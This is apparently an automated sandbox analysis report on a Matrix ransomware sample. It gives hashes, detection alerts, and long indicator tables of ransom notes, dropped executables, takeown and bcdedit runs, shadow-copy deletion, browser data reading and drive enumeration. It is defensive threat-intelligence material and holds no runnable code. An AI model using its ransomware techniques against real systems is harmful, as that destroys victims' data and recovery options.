matrix | 2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac

Analysis

max time kernel
138s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
05-03-2022 16:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
Size

1.5MB
MD5

7b5d977cef12c94558a3ef7dcc44396b
SHA1

c00a63341b6516680b31d0b6673c8e52dcc99c8d
SHA256

2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac
SHA512

6a62813ca7c0c53a917b8e345505978e23c17bf8fadea512bb9b13d78ccde8ccb81e92d5dce14ab40941d0fecec95946b57314ab5541f732ac8d532b6e60b691

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jre1.8.0_66\bin\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Mozilla Firefox\browser\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Mozilla Firefox\defaults\pref\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3kzncs28.default-release\datareporting\archived\2022-01\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\ProgramData\Oracle\Java\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\ProgramData\Microsoft\Crypto\SystemKeys\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Comms\UnistoreDB\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\UProof\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\ProgramData\Microsoft\ClickToRun\ProductReleases\EE65D8FF-D437-4FAB-B3BC-C1431E48AD1A\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\ProgramData\Microsoft\User Account Pictures\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\ProgramData\Oracle\Java\installcache_x64\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1592	bcdedit.exe
2864	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
154	8	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	cIzGULwq64.exe

Executes dropped EXE 64 IoCs

pid	Process
1768	NWg3R1sc.exe
3796	cIzGULwq.exe
3568	cIzGULwq64.exe
3968	cIzGULwq.exe
3496	cIzGULwq.exe
1016	cIzGULwq.exe
2912	cIzGULwq.exe
2168	cIzGULwq.exe
2656	cIzGULwq.exe
2444	cIzGULwq.exe
1680	cIzGULwq.exe
1144	cIzGULwq.exe
1140	cIzGULwq.exe
3496	cIzGULwq.exe
3472	cIzGULwq.exe
3916	cIzGULwq.exe
1628	cIzGULwq.exe
3496	cIzGULwq.exe
548	cIzGULwq.exe
1936	cIzGULwq.exe
3672	cIzGULwq.exe
3756	cIzGULwq.exe
1520	cIzGULwq.exe
3916	cIzGULwq.exe
3232	cIzGULwq.exe
3980	cIzGULwq.exe
3588	cIzGULwq.exe
2984	cIzGULwq.exe
3916	cIzGULwq.exe
3668	cIzGULwq.exe
2956	cIzGULwq.exe
2984	cIzGULwq.exe
972	cIzGULwq.exe
3980	cIzGULwq.exe
3668	cIzGULwq.exe
2520	cIzGULwq.exe
3480	cIzGULwq.exe
3756	cIzGULwq.exe
3336	cIzGULwq.exe
1920	cIzGULwq.exe
3960	cIzGULwq.exe
3980	cIzGULwq.exe
3756	cIzGULwq.exe
2484	cIzGULwq.exe
1920	cIzGULwq.exe
3336	cIzGULwq.exe
3772	cIzGULwq.exe
3256	cIzGULwq.exe
3692	cIzGULwq.exe
2096	cIzGULwq.exe
2092	cIzGULwq.exe
1360	cIzGULwq.exe
1920	cIzGULwq.exe
2968	cIzGULwq.exe
648	cIzGULwq.exe
548	cIzGULwq.exe
1148	cIzGULwq.exe
1140	cIzGULwq.exe
3256	cIzGULwq.exe
1144	cIzGULwq.exe
972	cIzGULwq.exe
2648	cIzGULwq.exe
2608	cIzGULwq.exe
3968	cIzGULwq.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022120-150.dat	upx
behavioral2/files/0x0006000000022120-151.dat	upx
behavioral2/files/0x0006000000022120-154.dat	upx
behavioral2/files/0x0006000000022120-155.dat	upx
behavioral2/files/0x0006000000022120-156.dat	upx
behavioral2/files/0x0006000000022120-157.dat	upx
behavioral2/files/0x0006000000022120-158.dat	upx
behavioral2/files/0x0006000000022120-159.dat	upx
behavioral2/files/0x0006000000022120-160.dat	upx
behavioral2/files/0x0006000000022120-161.dat	upx
behavioral2/files/0x0006000000022120-162.dat	upx
behavioral2/files/0x0006000000022120-163.dat	upx
behavioral2/files/0x0006000000022120-164.dat	upx
behavioral2/files/0x0006000000022120-165.dat	upx
behavioral2/files/0x0006000000022120-167.dat	upx
behavioral2/files/0x0006000000022120-168.dat	upx
behavioral2/files/0x0006000000022120-170.dat	upx
behavioral2/files/0x0006000000022120-171.dat	upx
behavioral2/files/0x0006000000022120-172.dat	upx
behavioral2/files/0x0006000000022120-173.dat	upx
behavioral2/files/0x0006000000022120-174.dat	upx
behavioral2/files/0x0006000000022120-175.dat	upx
behavioral2/files/0x0006000000022120-176.dat	upx
behavioral2/files/0x0006000000022120-177.dat	upx
behavioral2/files/0x0006000000022120-178.dat	upx
behavioral2/files/0x0006000000022120-179.dat	upx
behavioral2/files/0x0006000000022120-180.dat	upx
behavioral2/files/0x0006000000022120-181.dat	upx
behavioral2/files/0x0006000000022120-182.dat	upx
behavioral2/files/0x0006000000022120-183.dat	upx
behavioral2/files/0x0006000000022120-184.dat	upx
behavioral2/files/0x0006000000022120-185.dat	upx
behavioral2/files/0x0006000000022120-186.dat	upx
behavioral2/files/0x0006000000022120-187.dat	upx
behavioral2/files/0x0006000000022120-188.dat	upx
behavioral2/files/0x0006000000022120-189.dat	upx
behavioral2/files/0x0006000000022120-190.dat	upx
behavioral2/files/0x0006000000022120-191.dat	upx
behavioral2/files/0x0006000000022120-192.dat	upx
behavioral2/files/0x0006000000022120-193.dat	upx
behavioral2/files/0x0006000000022120-194.dat	upx
behavioral2/files/0x0006000000022120-195.dat	upx
behavioral2/files/0x0006000000022120-196.dat	upx
behavioral2/files/0x0006000000022120-197.dat	upx
behavioral2/files/0x0006000000022120-198.dat	upx
behavioral2/files/0x0006000000022120-199.dat	upx
behavioral2/files/0x0006000000022120-200.dat	upx
behavioral2/files/0x0006000000022120-201.dat	upx
behavioral2/files/0x0006000000022120-202.dat	upx
behavioral2/files/0x0006000000022120-203.dat	upx
behavioral2/files/0x0006000000022120-204.dat	upx
behavioral2/files/0x0006000000022120-205.dat	upx
behavioral2/files/0x0006000000022120-206.dat	upx
behavioral2/files/0x0006000000022120-207.dat	upx
behavioral2/files/0x0006000000022120-208.dat	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	wscript.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1104	takeown.exe
2648	takeown.exe
2084	takeown.exe
648	takeown.exe
780	takeown.exe
1140	takeown.exe
520	takeown.exe
3372	takeown.exe
2084	takeown.exe
3184	takeown.exe
3960	takeown.exe
1280	takeown.exe
3968	takeown.exe
844	takeown.exe
2864	takeown.exe
3836	takeown.exe
2916	takeown.exe
1708	takeown.exe
2020	takeown.exe
1140	takeown.exe
1256	takeown.exe
2252	takeown.exe
1920	takeown.exe
1492	takeown.exe
2484	takeown.exe
1280	takeown.exe
2088	Process not Found
2452	takeown.exe
2648	takeown.exe
1392	takeown.exe
2428	takeown.exe
3740	takeown.exe
112	takeown.exe
1352	takeown.exe
3012	takeown.exe
1564	takeown.exe
2484	takeown.exe
1412	takeown.exe
1140	takeown.exe
3692	takeown.exe
3460	takeown.exe
844	takeown.exe
2420	takeown.exe
112	takeown.exe
3996	takeown.exe
1592	takeown.exe
3692	takeown.exe
3336	takeown.exe
1708	takeown.exe
1708	takeown.exe
1708	takeown.exe
3888	takeown.exe
264	takeown.exe
2484	takeown.exe
3836	takeown.exe
2916	takeown.exe
3884	takeown.exe
2916	takeown.exe
2864	takeown.exe
292	takeown.exe
2956	takeown.exe
2484	takeown.exe
2420	takeown.exe
1104	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Pictures\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\W:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\P:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\N:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\L:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\N:	cIzGULwq64.exe
File opened (read-only)	\??\O:	cIzGULwq64.exe
File opened (read-only)	\??\Z:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\U:	cIzGULwq64.exe
File opened (read-only)	\??\I:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\H:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\L:	cIzGULwq64.exe
File opened (read-only)	\??\Q:	cIzGULwq64.exe
File opened (read-only)	\??\V:	cIzGULwq64.exe
File opened (read-only)	\??\J:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\S:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\R:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\E:	cIzGULwq64.exe
File opened (read-only)	\??\P:	cIzGULwq64.exe
File opened (read-only)	\??\Y:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\E:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\J:	cIzGULwq64.exe
File opened (read-only)	\??\T:	cIzGULwq64.exe
File opened (read-only)	\??\X:	cIzGULwq64.exe
File opened (read-only)	\??\K:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\G:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\B:	cIzGULwq64.exe
File opened (read-only)	\??\K:	cIzGULwq64.exe
File opened (read-only)	\??\Z:	cIzGULwq64.exe
File opened (read-only)	\??\V:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\O:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\S:	cIzGULwq64.exe
File opened (read-only)	\??\Y:	cIzGULwq64.exe
File opened (read-only)	\??\Q:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\H:	cIzGULwq64.exe
File opened (read-only)	\??\M:	cIzGULwq64.exe
File opened (read-only)	\??\R:	cIzGULwq64.exe
File opened (read-only)	\??\M:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
